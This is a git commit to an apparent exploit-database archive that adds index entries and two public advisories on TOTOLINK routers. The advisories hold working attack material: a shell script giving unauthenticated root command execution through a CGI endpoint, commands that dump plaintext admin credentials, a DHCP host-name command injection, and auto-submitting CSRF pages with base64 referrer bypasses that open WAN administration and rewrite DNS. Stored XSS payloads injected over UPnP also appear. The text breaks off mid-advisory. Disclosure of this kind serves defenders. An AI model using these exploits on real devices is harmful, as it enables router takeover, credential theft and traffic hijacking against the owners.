DB: 2015-07-17
4 new exploits
This commit is contained in:
parent
9657eacb4d
commit
5454188b4e
5 changed files with 998 additions and 1 deletions
|
@ -16058,7 +16058,7 @@ id,file,description,date,author,platform,type,port
|
|||
18526,platforms/php/webapps/18526.php,"YVS Image Gallery SQL Injection",2012-02-25,CorryL,php,webapps,0
|
||||
18527,platforms/php/webapps/18527.txt,"ContaoCMS (aka TYPOlight) <= 2.11 - CSRF (Delete Admin - Delete Article)",2012-02-26,"Ivano Binetti",php,webapps,0
|
||||
18547,platforms/windows/local/18547.rb,"DJ Studio Pro 5.1 - (.pls) Stack Buffer Overflow",2012-03-02,metasploit,windows,local,0
|
||||
18531,platforms/windows/remote/18531.html,"Mozilla Firefox Firefox 4.0.1 Array.reduceRight() Exploit",2012-02-27,pa_kt,windows,remote,0
|
||||
18531,platforms/windows/remote/18531.html,"Mozilla Firefox 4.0.1 - Array.reduceRight() Exploit",2012-02-27,pa_kt,windows,remote,0
|
||||
18533,platforms/windows/local/18533.txt,"Socusoft Photo 2 Video 8.05 - Buffer Overflow Vulnerability",2012-02-27,Vulnerability-Lab,windows,local,0
|
||||
18534,platforms/windows/remote/18534.py,"Sysax Multi Server 5.53 SFTP Post Auth SEH Exploit",2012-02-27,"Craig Freyman",windows,remote,0
|
||||
18535,platforms/windows/remote/18535.py,"Sysax <= 5.53 SSH Username BoF Pre Auth RCE (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0
|
||||
|
@ -33956,3 +33956,7 @@ id,file,description,date,author,platform,type,port
|
|||
37616,platforms/php/webapps/37616.txt,"PBBoard admin.php xml_name Parameter Arbitrary PHP Code Execution",2012-08-08,"High-Tech Bridge",php,webapps,0
|
||||
37617,platforms/php/webapps/37617.txt,"dirLIST Multiple Local File Include and Arbitrary File Upload Vulnerabilities",2012-08-08,L0n3ly-H34rT,php,webapps,0
|
||||
37620,platforms/php/webapps/37620.txt,"Joomla DOCman Component - Multiple Vulnerabilities",2015-07-15,"Hugo Santiago",php,webapps,80
|
||||
37623,platforms/hardware/webapps/37623.txt,"15 TOTOLINK Router Models - Multiple RCE Vulnerabilities",2015-07-16,"Pierre Kim",hardware,webapps,0
|
||||
37624,platforms/hardware/webapps/37624.txt,"4 TOTOLINK Router Models - CSRF and XSS Vulnerabilities",2015-07-16,"Pierre Kim",hardware,webapps,0
|
||||
37625,platforms/hardware/webapps/37625.txt,"4 TOTOLINK Router Models - Backdoor Credentials",2015-07-16,"Pierre Kim",hardware,webapps,0
|
||||
37626,platforms/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor and RCE",2015-07-16,"Pierre Kim",hardware,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
378
platforms/hardware/webapps/37623.txt
Executable file
378
platforms/hardware/webapps/37623.txt
Executable file
|
@ -0,0 +1,378 @@
|
|||
## Advisory Information
|
||||
|
||||
Title: 15 TOTOLINK router models vulnerable to multiple RCEs
|
||||
Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x00.txt
|
||||
Blog URL: https://pierrekim.github.io/blog/2015-07-16-15-TOTOLINK-products-vulnerable-to-multiple-RCEs.html
|
||||
Date published: 2015-07-16
|
||||
Vendors contacted: None
|
||||
Release mode: 0days, Released
|
||||
CVE: no current CVE
|
||||
|
||||
|
||||
|
||||
## Product Description
|
||||
|
||||
TOTOLINK is a brother brand of ipTime which wins over 80% of SOHO
|
||||
markets in South Korea.
|
||||
TOTOLINK produces routers routers, wifi access points and network
|
||||
devices. Their products are sold worldwide.
|
||||
|
||||
|
||||
|
||||
## Vulnerabilities Summary
|
||||
|
||||
The first vulnerability allows to bypass the admin authentication and
|
||||
to get a direct RCE from the LAN side with a single HTTP request.
|
||||
|
||||
The second vulnerability allows to bypass the admin authentication and
|
||||
to get a direct RCE from the LAN side with a single DHCP request.
|
||||
|
||||
There are direct RCEs against the routers which give a complete root
|
||||
access to the embedded Linux from the LAN side.
|
||||
|
||||
The two RCEs affect 13 TOTOLINK products from 2009-era firmwares to
|
||||
the latest firmwares with the default configuration:
|
||||
|
||||
- TOTOLINK A1004 : until last firmware (9.34 - za1004_en_9_34.bin)
|
||||
- TOTOLINK A5004NS : until last firmware (9.38 - za5004s_en_9_38.bin)
|
||||
- TOTOLINK EX300 : until last firmware (8.68 - TOTOLINK EX300_8_68.bin
|
||||
- totolink.net)
|
||||
- TOTOLINK EX300 : until last firmware (9.36 -
|
||||
ex300_ch_9_36.bin.5357c0 - totolink.cn)
|
||||
- TOTOLINK N150RB : until last firmware (9.08 - zn150rb_en_9_08.bin.5357c0)
|
||||
- TOTOLINK N300RB : until last firmware (9.26 - zn300rb_en_9_26.bin)
|
||||
- TOTOLINK N300RG : until last firmware (8.70 - TOTOLINK N300RG_8_70.bin)
|
||||
- TOTOLINK N500RDG : until last firmware (8.42 - TOTOLINK N500RDG_en_8_42.bin)
|
||||
- TOTOLINK N600RD : until last firmware (8.64 - TOTOLINK N600RD_en_8_64.bin)
|
||||
- TOTOLINK N302R Plus V1 : until the last firmware 8.82 (TOTOLINK
|
||||
N302R Plus V1_en_8_82.bin)
|
||||
- TOTOLINK N302R Plus V2 : until the last firmware 9.08 (TOTOLINK
|
||||
N302R Plus V2_en_9_08.bin)
|
||||
- TOTOLINK A3004NS (no firmware available in totolinkusa.com but
|
||||
ipTIME's A3004NS model was vulnerable to the 2 RCEs)
|
||||
- TOTOLINK EX150 : until the last firmware (8.82 - ex150_ch_8_82.bin.5357c0)
|
||||
|
||||
|
||||
The DHCP RCE also affects 2 TOTOLINK products from 2009-era firmwares
|
||||
to the latest firmwares with the default configuration:
|
||||
|
||||
- TOTOLINK A2004NS : until last firmware (9.60 - za2004s_en_9_60.bin)
|
||||
- TOTOLINK EX750 : until last firmware (9.60 - ex750_en_9_60.bin)
|
||||
|
||||
|
||||
Firmwares come from totolink.net and from totolink.cn.
|
||||
|
||||
- - From my tests, it is possible to use these vulnerabilities to
|
||||
overwrite the firmware with a custom (backdoored) firmware.
|
||||
|
||||
Concerning the high CVSS score (10/10) of the vulnerabilities and the
|
||||
longevity of this vulnerability (6+ year old),
|
||||
the TOTOLINK users are urged to contact TOTOLINK.
|
||||
|
||||
|
||||
|
||||
## Details - RCE with a single HTTP request
|
||||
|
||||
The HTTP server allows the attacker to execute some CGI files.
|
||||
|
||||
Many of them are vulnerable to a command inclusion which allows to
|
||||
execute commands with the http daemon user rights (root).
|
||||
|
||||
|
||||
Exploit code:
|
||||
|
||||
$ cat totolink.carnage
|
||||
#!/bin/sh
|
||||
if [ ! $1 ]; then
|
||||
echo "Usage:"
|
||||
echo $0 ip command
|
||||
exit 1
|
||||
fi
|
||||
wget -qO- --post-data="echo 'Content-type:
|
||||
text/plain';echo;echo;PATH=$PATH:/sbin $2 $3 $4" http://$1/cgi-bin/sh
|
||||
|
||||
|
||||
The exploits have been written in HTML/JavaScript, in form of CSRF
|
||||
attacks, allowing people to test their systems in live using their
|
||||
browsers:
|
||||
http://pierrekim.github.io/advisories/
|
||||
|
||||
|
||||
o Listing of the filesystem
|
||||
|
||||
HTML/JS exploits:
|
||||
|
||||
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-listing.of.the.filesystem.html
|
||||
|
||||
Using CLI:
|
||||
|
||||
root@kali:~/totolink# ./totolink.carnage 192.168.1.1 ls | head
|
||||
ash
|
||||
auth
|
||||
busybox
|
||||
cat
|
||||
chmod
|
||||
cp
|
||||
d.cgi
|
||||
date
|
||||
echo
|
||||
false
|
||||
root@kali:~/totolink#
|
||||
|
||||
|
||||
o How to retrieve the credentials ? (see login and password at the end
|
||||
of the text file)
|
||||
|
||||
HTML/JS exploits:
|
||||
|
||||
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-dump.configuration.including.credentials.html
|
||||
|
||||
Using CLI:
|
||||
|
||||
kali# ./totolink.carnage 192.168.1.1 cat /tmp/etc/iconfig.cfg
|
||||
wantype.wan1=dynamic
|
||||
dhblock.eth1=0
|
||||
ppp_mtu=1454
|
||||
fakedns=0
|
||||
upnp=1
|
||||
ppp_mtu=1454
|
||||
timeserver=time.windows.com,gmt22,1,480,0
|
||||
wan_ifname=eth1
|
||||
auto_dns=1
|
||||
dhcp_auto_detect=0
|
||||
wireless_ifmode+wlan0=wlan0,0
|
||||
dhcpd=0
|
||||
lan_ip=192.168.1.1
|
||||
lan_netmask=255.255.255.0
|
||||
dhcpd_conf=br0,192.168.1.2,192.168.1.253,192.168.1.1,255.255.255.0
|
||||
dhcpd_dns=164.124.101.2,168.126.63.2
|
||||
dhcpd_opt=7200,30,200,
|
||||
dhcpd_configfile=/etc/udhcpd.conf
|
||||
dhcpd_lease_file=/etc/udhcpd.leases
|
||||
dhcpd_static_lease_file=/etc/udhcpd.static
|
||||
use_local_gateway=1
|
||||
login=admin
|
||||
password=admin
|
||||
|
||||
Login and password are stored in plaintext, which is a very bad
|
||||
security practice.
|
||||
|
||||
|
||||
o Current running process:
|
||||
|
||||
HTML/JS exploits:
|
||||
|
||||
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-current.process.html
|
||||
|
||||
Using CLI:
|
||||
|
||||
kali# ./totolink.carnage 192.168.1.1 ps -auxww
|
||||
|
||||
|
||||
o Getting the kernel memory:
|
||||
|
||||
HTML/JS exploits:
|
||||
|
||||
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-getting.kernel.memory.html
|
||||
|
||||
Using CLI:
|
||||
|
||||
kali# ./totolink.carnage 192.168.1.1 cat /proc/kcore
|
||||
|
||||
|
||||
o Default firewall rules:
|
||||
|
||||
HTML/JS exploits:
|
||||
|
||||
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-default.firewall.rules.html
|
||||
|
||||
Using CLI:
|
||||
|
||||
kali# ./iptime.carnage.l2.v9.52 192.168.1.1 iptables -nL
|
||||
|
||||
|
||||
o Opening the management interface on the WAN:
|
||||
|
||||
HTML/JS exploits:
|
||||
|
||||
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-opening.the.firewall.html
|
||||
|
||||
|
||||
o Reboot the device:
|
||||
|
||||
HTML/JS exploits:
|
||||
|
||||
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-reboot.html
|
||||
|
||||
|
||||
o Brick the device:
|
||||
|
||||
HTML/JS exploits:
|
||||
|
||||
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-bricking.the.device.html
|
||||
|
||||
|
||||
An attacker can use the /usr/bin/wget binary located in the file
|
||||
system of the remote device to plant a backdoor and then execute it as
|
||||
root.
|
||||
|
||||
By the way, d.cgi in /bin/ is an intentional backdoor.
|
||||
|
||||
|
||||
|
||||
## Details - RCE with a single DHCP request
|
||||
|
||||
This vulnerability is the exact inverse of CVE-2011-0997. The DHCPD
|
||||
server in TOTOLINK devices allows remote attackers to execute
|
||||
arbitrary commands
|
||||
via shell metacharacters in the host-name field.
|
||||
|
||||
Sending a DHCP request with this parameter will reboot the device:
|
||||
|
||||
cat /etc/dhcp/dhclient.conf
|
||||
|
||||
send host-name ";/sbin/reboot";
|
||||
|
||||
When connecting to the UART port (`screen /dev/ttyUSB0 38400`), we
|
||||
will see the stdout of the /dev/console device;
|
||||
the dhcp request will immediately force the reboot of the remote device:
|
||||
|
||||
|
||||
Booting...
|
||||
|
||||
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
|
||||
@
|
||||
@ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize
|
||||
@ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h
|
||||
@ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName
|
||||
@ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16
|
||||
@
|
||||
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
|
||||
|
||||
[...]
|
||||
WiFi Simple Config v1.12 (2009.07.31-11:35+0000).
|
||||
|
||||
Launch iwcontrol: wlan0
|
||||
Reaped 317
|
||||
iwcontrol RUN OK
|
||||
SIGNAL -> Config Update signal progress
|
||||
killall: pppoe-relay: no process killed
|
||||
SIGNAL -> WAN ip changed
|
||||
WAN0 IP: 192.168.2.1
|
||||
signalling START
|
||||
Invalid upnpd exit
|
||||
killall: upnpd: no process killed
|
||||
upnpd Restart 1
|
||||
iptables: Bad rule (does a matching rule exist in that chain?)
|
||||
Session Garbage Collecting:Maybe system time is updated.( 946684825 0 )
|
||||
Update Session timestamp and try it after 5 seconds again.
|
||||
ez_ipupdate callback --> time_elapsed: 0
|
||||
Run DDNS by IP change: / 192.168.2.1
|
||||
Reaped 352
|
||||
iptables: Bad rule (does a matching rule exist in that chain?)
|
||||
Jan 1 00:00:25 miniupnpd[370]: Reloading rules from lease file
|
||||
Jan 1 00:00:25 miniupnpd[370]: could not open lease file: /var/run/upnp_pmlist
|
||||
Jan 1 00:00:25 miniupnpd[370]: HTTP listening on port 2048
|
||||
Reaped 363
|
||||
Led Silent Callback
|
||||
Turn ON All LED
|
||||
Dynamic Channel Search for wlan0 is OFF
|
||||
start_signal => plantynet_sync
|
||||
Do start_signal => plantynet_sync
|
||||
SIGNAL -> Config Update signal progress
|
||||
killall: pppoe-relay: no process killed
|
||||
SIGNAL -> WAN ip changed
|
||||
Reaped 354
|
||||
iptables: Bad rule (does a matching rule exist in that chain?)
|
||||
ez_ipupdate callback --> time_elapsed: 1
|
||||
Run DDNS by IP change: / 192.168.2.1
|
||||
Burst DDNS Registration is denied: iptime -> now:26
|
||||
Led Silent Callback
|
||||
Turn ON All LED
|
||||
/proc/sys/net/ipv4/tcp_syn_retries: cannot create
|
||||
- - - ---> Plantynet Event : 00000003
|
||||
- - - ---> PLANTYNET_SYNC_INTERNET_BLOCK_DEVICE
|
||||
|
||||
|
||||
[sending the DHCP request]
|
||||
|
||||
|
||||
[01/Jan/2000:00:01:03 +0000] [01/Jan/2000:00:01:03 +0000] Jan 1
|
||||
00:01:03 miniupnpd[370]: received signal 15, good-bye
|
||||
Reaped 392
|
||||
Reaped 318
|
||||
Reaped 314
|
||||
Reaped 290
|
||||
Reaped 288
|
||||
Reaped 268
|
||||
Reaped 370
|
||||
Reaped 367
|
||||
- - - ---> PLANTYNET_SYNC_FREE_DEVICE
|
||||
Restarting system.
|
||||
|
||||
Booting...
|
||||
|
||||
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
|
||||
@
|
||||
@ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize
|
||||
@ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h
|
||||
@ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName
|
||||
@ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16
|
||||
@
|
||||
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
|
||||
Reboot Result from Watchdog Timeout!
|
||||
|
||||
- - - ---RealTek(RTL8196E)at 2012.07.06-04:36+0900 v0.4 [16bit](400MHz)
|
||||
Delay 1 second till reset button
|
||||
Magic Number: raw_nv 00000000
|
||||
Check Firmware(05020000) : size: 0x001ddfc8 ---->
|
||||
|
||||
|
||||
[...]
|
||||
|
||||
|
||||
An attacker can use the /usr/bin/wget binary located in the file
|
||||
system of the remote device to plant a backdoor and then execute it as
|
||||
root.
|
||||
|
||||
|
||||
|
||||
## Vendor Response
|
||||
|
||||
Due to "un-ethical code" found in TOTOLINK products (= backdoors found
|
||||
in new TOTOLINK devices), TOTOLINK was not contacted in regard of this
|
||||
case, but ipTIME was contacted in April 2015 concerning the first RCE.
|
||||
|
||||
|
||||
|
||||
## Report Timeline
|
||||
|
||||
* Jun 01, 2014: First RCE found by Pierre Kim and Alexandre Torres in
|
||||
ipTIME products.
|
||||
* Jun 02, 2014: Second RCE found by Pierre Kim in ipTIME products.
|
||||
* Jun 25, 2015: Similar vulnerabilities found in TOTOLINK products.
|
||||
* Jul 13, 2015: TOTOLINK silently fixed the HTTP RCE in A2004NS and
|
||||
EX750 routers.
|
||||
* Jul 13, 2015: Updated firmwares confirmed vulnerable.
|
||||
* Jul 16, 2015: A public advisory is sent to security mailing lists.
|
||||
|
||||
|
||||
|
||||
## Credit
|
||||
|
||||
These vulnerabilities were found by Alexandre Torres and Pierre Kim
|
||||
(@PierreKimSec).
|
||||
|
||||
|
||||
|
||||
## References
|
||||
|
||||
https://pierrekim.github.io/advisories/2015-totolink-0x00.txt
|
||||
https://pierrekim.github.io/blog/2015-07-16-15-TOTOLINK-products-vulnerable-to-multiple-RCEs.html
|
||||
|
||||
|
||||
|
||||
## Disclaimer
|
||||
|
||||
This advisory is licensed under a Creative Commons Attribution Non-Commercial
|
||||
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
|
294
platforms/hardware/webapps/37624.txt
Executable file
294
platforms/hardware/webapps/37624.txt
Executable file
|
@ -0,0 +1,294 @@
|
|||
## Advisory Information
|
||||
|
||||
Title: 4 TOTOLINK router models vulnerable to CSRF and XSS attacks
|
||||
Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x01.txt
|
||||
Blog URL: http://pierrekim.github.io/blog/2015-07-16-4-TOTOLINK-products-vulnerable-to-CSRF-and-XSS-attacks.html
|
||||
Date published: 2015-07-16
|
||||
Vendors contacted: None
|
||||
Release mode: Released, 0day
|
||||
CVE: no current CVE
|
||||
|
||||
|
||||
|
||||
## Product Description
|
||||
|
||||
TOTOLINK is a brother brand of ipTime which wins over 80% of SOHO
|
||||
markets in South Korea.
|
||||
TOTOLINK produces routers routers, wifi access points and network
|
||||
devices. Their products are sold worldwide.
|
||||
|
||||
|
||||
|
||||
## Vulnerability Summary
|
||||
|
||||
TOTOLINK iPuppy, iPuppy3, N100RE and N200RE are wireless LAN routers.
|
||||
Their current firmwares with default configuration are
|
||||
vulnerable to CSRF-attacks and XSS attacks.
|
||||
Since, the anti-CSRF protection is based on a static HTTP referrer
|
||||
(RFC 1945), an attacker can take over
|
||||
most of the configuration and settings using anyone inside the LAN of
|
||||
the router. Owners are urged to
|
||||
contact TOTOLINK, and activate authentication on this product
|
||||
(disabled by default).
|
||||
|
||||
It affects (firmware come from totolink.net and from totolink.cn):
|
||||
|
||||
TOTOLINK iPuppy : firmware 1.2.1 (TOTOLINK iPuppy__V1.2.1.update)
|
||||
TOTOLINK iPuppy3 : firmware 1.0.2 (TOTOLINK iPuppy3_V1.0.2.update)
|
||||
TOTOLINK N100RE-V1 : firmware V1.1-B20140723-2-432-EN
|
||||
(TOTOLINK-N100RE-IP04216-RT5350-SPI-1M8M-V1.1-B20140723-2-432-EN.update)
|
||||
TOTOLINK N200RE : firmware V1.4-B20140724-2-457-EN
|
||||
(TOTOLINK-N200RE-IP04220-MT7620-SPI-1M8M-V1.4-B20140724-2-457-EN.update)
|
||||
|
||||
|
||||
|
||||
## Details - CSRF
|
||||
|
||||
The HTTP interface allows to edit the configuration. This interface is
|
||||
vulnerable to CSRF.
|
||||
|
||||
Configuration and settings can be modified with CSRF attacks:
|
||||
Activate the remote control management
|
||||
Change the DNS configuration
|
||||
Update the firmware
|
||||
Change the Wifi Configuration
|
||||
Create TCP redirections to the LAN
|
||||
and more...
|
||||
|
||||
|
||||
Example of forms exploiting the CSRF:
|
||||
|
||||
|
||||
o Activating the remote control management on port 31337/tcp listening
|
||||
on the WAN interface.
|
||||
|
||||
<html>
|
||||
<head>
|
||||
<script>
|
||||
function s() {
|
||||
document.f.submit();
|
||||
}
|
||||
</script>
|
||||
</head>
|
||||
<body onload="s()">
|
||||
<form id="f" name="f" method="POST" action="http://192.168.1.1/do_cmd.htm">
|
||||
<input type="hidden" name="CMD" value="SYS">
|
||||
<input type="hidden" name="GO" value="firewallconf_accesslist.html">
|
||||
<input type="hidden" name="nowait" value="1">
|
||||
<input type="hidden" name="SET0" value="17367296=31337">
|
||||
<input type="hidden" name="SET1" value="17236224=1">
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
o Changing the DNS configuration to 0.2.0.7 and 1.2.0.1:
|
||||
|
||||
<html>
|
||||
<head>
|
||||
<script>
|
||||
function s() {
|
||||
document.f.submit();
|
||||
}
|
||||
</script>
|
||||
</head>
|
||||
<body onload="s()">
|
||||
<form id="f" name="f" method="POST" action="http://192.168.1.1/do_cmd.htm">
|
||||
<input type="hidden" name="CMD" value="WAN">
|
||||
<input type="hidden" name="GO" value="netconf_wansetup.html">
|
||||
<input type="hidden" name="SET0" value="50397440=2">
|
||||
<input type="hidden" name="SET1" value="50856960=64-E5-99-AA-AA-AA">
|
||||
<input type="hidden" name="SET2" value="235077888=1">
|
||||
<input type="hidden" name="SET3" value="235012865=0.2.0.7">
|
||||
<input type="hidden" name="SET4" value="235012866=1.2.0.1">
|
||||
<input type="hidden" name="SET5" value="51118336=0">
|
||||
<input type="hidden" name="SET6" value="51839232=1">
|
||||
<input type="hidden" name="SET7" value="51511552=1500">
|
||||
<input type="hidden" name="SET8" value="117834240=">
|
||||
<input type="hidden" name="SET9" value="117703168=">
|
||||
<input type="hidden" name="SET10" value="117637376=1492">
|
||||
<input type="hidden" name="SET11" value="51446016=1500">
|
||||
<input type="hidden" name="SET12" value="50463488=192.168.1.1">
|
||||
<input type="hidden" name="SET13" value="50529024=255.255.255.0">
|
||||
<input type="hidden" name="SET14" value="50594560=192.168.1.254">
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
The variable GO is an open redirect. Any URL like
|
||||
http://www.google.com/ for instance can be used.
|
||||
The variable GO is also vulnerable to XSS. It's out of scope in this advisory.
|
||||
|
||||
|
||||
To bypass the protection (which checks the refer), you can, for
|
||||
example, base64 the form and include
|
||||
it in the webpage.
|
||||
The refer will be empty and the CSRF will be accepted by the device:
|
||||
|
||||
|
||||
|
||||
o activate_admin_wan_csrf_bypass.html:
|
||||
|
||||
<html>
|
||||
<head>
|
||||
<meta http-equiv="Refresh"
|
||||
content="1;url=data:text/html;charset=utf8;base64,PGh0bWw+CjxoZWFkPgo8c2NyaXB0PgpmdW5jdGlvbiBzKCkgewogIGRvY3VtZW50LmYuc3VibWl0KCk7Cn0KPC9zY3JpcHQ+CjwvaGVhZD4KPGJvZHkgb25sb2FkPSJzKCkiPgo8Zm9ybSBpZD0iZiIgbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249Imh0dHA6Ly8xOTIuMTY4LjEuMS9kb19jbWQuaHRtIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iQ01EIiB2YWx1ZT0iU1lTIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iR08iIHZhbHVlPSJmaXJld2FsbGNvbmZfYWNjZXNzbGlzdC5odG1sIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0ibm93YWl0IiB2YWx1ZT0iMSI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDAiIHZhbHVlPSIxNzM2NzI5Nj0zMTMzNyI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDEiIHZhbHVlPSIxNzIzNjIyND0xIj4KPC9mb3JtPgo8L2JvZHk+CjwvaHRtbD4K">
|
||||
</head>
|
||||
<body>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
Visiting activate_admin_wan_csrf_bypass.html in a remote location will activate
|
||||
the remote management interface on port 31337/TCP.
|
||||
|
||||
You can test it through
|
||||
http://pierrekim.github.io/advisories/2015-totolink-0x01-PoC-change_dns_csrf_bypass.html
|
||||
|
||||
|
||||
|
||||
o change_dns_csrf_bypass.html:
|
||||
|
||||
<html>
|
||||
<head>
|
||||
<meta http-equiv="Refresh"
|
||||
content="1;url=data:text/html;charset=utf8;base64,PGh0bWw+CjxoZWFkPgo8c2NyaXB0PgpmdW5jdGlvbiBzKCkgewogIGRvY3VtZW50LmYuc3VibWl0KCk7Cn0KPC9zY3JpcHQ+CjwvaGVhZD4KPGJvZHkgb25sb2FkPSJzKCkiPgo8Zm9ybSBpZD0iZiIgbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249Imh0dHA6Ly8xOTIuMTY4LjEuMS9kb19jbWQuaHRtIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iQ01EIiB2YWx1ZT0iV0FOIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iR08iIHZhbHVlPSJuZXRjb25mX3dhbnNldHVwLmh0bWwiPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJTRVQwIiB2YWx1ZT0iNTAzOTc0NDA9MiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDEiIHZhbHVlPSI1MDg1Njk2MD02NC1FNS05OS1BQS1BQS1BQSI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDIiIHZhbHVlPSIyMzUwNzc4ODg9MSI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDMiIHZhbHVlPSIyMzUwMTI4NjU9MC4yLjAuNyI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDQiIHZhbHVlPSIyMzUwMTI4NjY9MS4yLjAuMSI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDUiIHZhbHVlPSI1MTExODMzNj0wIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iU0VUNiIgdmFsdWU9IjUxODM5MjMyPTEiPgo8aW5wdXQgdHlwZT0iaGlkZGVu
|
||||
IiBuYW1lPSJTRVQ3IiB2YWx1ZT0iNTE1MTE1NTI9MTUwMCI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDgiIHZhbHVlPSIxMTc4MzQyNDA9Ij4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iU0VUOSIgdmFsdWU9IjExNzcwMzE2OD0iPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJTRVQxMCIgdmFsdWU9IjExNzYzNzM3Nj0xNDkyIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iU0VUMTEiIHZhbHVlPSI1MTQ0NjAxNj0xNTAwIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iU0VUMTIiIHZhbHVlPSI1MDQ2MzQ4OD0xOTIuMTY4LjEuMSI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDEzIiB2YWx1ZT0iNTA1MjkwMjQ9MjU1LjI1NS4yNTUuMCI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IlNFVDE0IiB2YWx1ZT0iNTA1OTQ1NjA9MTkyLjE2OC4xLjI1NCI+CjwvZm9ybT4KPC9ib2R5Pgo8L2h0bWw+Cg==">
|
||||
</head>
|
||||
<body>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
Visiting activate_admin_wan_csrf_bypass.html in a remote location will
|
||||
change the DNS servers
|
||||
provided by the TOTOLINK device in the LAN.
|
||||
|
||||
You can test it through
|
||||
http://pierrekim.github.io/advisories/2015-totolink-0x01-PoC-activate_admin_wan_csrf_bypass.html
|
||||
|
||||
|
||||
|
||||
## Details - stored XSS and fun
|
||||
|
||||
There is a stored XSS, which can be injected using UPNP from the LAN,
|
||||
without authentication:
|
||||
|
||||
upnp> host send 0 WANConnectionDevice WANIPConnection AddPortMapping
|
||||
|
||||
Required argument:
|
||||
Argument Name: NewPortMappingDescription
|
||||
Data Type: string
|
||||
Allowed Values: []
|
||||
Set NewPortMappingDescription value to: <script>alert("XSS");</script>
|
||||
|
||||
Required argument:
|
||||
Argument Name: NewLeaseDuration
|
||||
Data Type: ui4
|
||||
Allowed Values: []
|
||||
Set NewLeaseDuration value to: 0
|
||||
|
||||
Required argument:
|
||||
Argument Name: NewInternalClient
|
||||
Data Type: string
|
||||
Allowed Values: []
|
||||
Set NewInternalClient value to: <script>alert("XSS");</script>
|
||||
|
||||
Required argument:
|
||||
Argument Name: NewEnabled
|
||||
Data Type: boolean
|
||||
Allowed Values: []
|
||||
Set NewEnabled value to: 1
|
||||
|
||||
Required argument:
|
||||
Argument Name: NewExternalPort
|
||||
Data Type: ui2
|
||||
Allowed Values: []
|
||||
Set NewExternalPort value to: 80
|
||||
|
||||
Required argument:
|
||||
Argument Name: NewRemoteHost
|
||||
Data Type: string
|
||||
Allowed Values: []
|
||||
Set NewRemoteHost value to: <script>alert("XSS");</script>
|
||||
|
||||
Required argument:
|
||||
Argument Name: NewProtocol
|
||||
Data Type: string
|
||||
Allowed Values: ['TCP', 'UDP']
|
||||
Set NewProtocol value to: TCP
|
||||
|
||||
Required argument:
|
||||
Argument Name: NewInternalPort
|
||||
Data Type: ui2
|
||||
Allowed Values: []
|
||||
Set NewInternalPort value to: 80
|
||||
|
||||
|
||||
upnp>
|
||||
|
||||
|
||||
The UPNP webpage in the administration area
|
||||
(http://192.168.0.1/popup_upnp_portmap.html) will show:
|
||||
|
||||
[...]
|
||||
<tr>
|
||||
<td class=item_td>TCP</td>
|
||||
<td class=item_td>21331</td>
|
||||
<td class=item_td><script>alert("XSS")<script>alert("XSS");</script>:28777</td>
|
||||
